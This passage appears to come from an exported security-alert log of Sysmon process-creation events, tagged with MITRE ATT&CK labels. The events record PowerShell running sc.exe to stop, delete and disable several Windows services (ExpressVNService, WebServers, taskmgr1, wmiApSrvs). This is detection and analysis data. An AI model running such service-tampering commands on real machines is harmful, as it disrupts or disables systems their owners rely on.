-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.717"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-001020932600}"",""processId"":""2780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.542",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.651 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010588e2600} +ProcessId: 5352 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.659060800Z"",""eventRecordID"":""2985"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.651\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010588e2600}\r\nProcessId: 5352\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.651"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010588e2600}"",""processId"":""5352"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.448",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.563 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010258c2600} +ProcessId: 7496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.582611900Z"",""eventRecordID"":""2983"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.563\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010258c2600}\r\nProcessId: 7496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.563"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010258c2600}"",""processId"":""7496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.433",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.524 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-00105d8b2600} +ProcessId: 5956 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.525763300Z"",""eventRecordID"":""2982"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.524\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-00105d8b2600}\r\nProcessId: 5956\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.524"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-00105d8b2600}"",""processId"":""5956"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.370",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.064 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010de872600} +ProcessId: 7088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.066900700Z"",""eventRecordID"":""2979"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.064\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010de872600}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.064"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010de872600}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.309",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.007 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001070842600} +ProcessId: 5044 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.010269000Z"",""eventRecordID"":""2976"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.007\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001070842600}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.007"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-001070842600}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.292",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.974 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001057832600} +ProcessId: 6504 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config wmiApSrvs Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config wmiApSrvs Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.976779500Z"",""eventRecordID"":""2975"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.974\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001057832600}\r\nProcessId: 6504\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config wmiApSrvs Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.974"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-001057832600}"",""processId"":""6504"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config wmiApSrvs Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 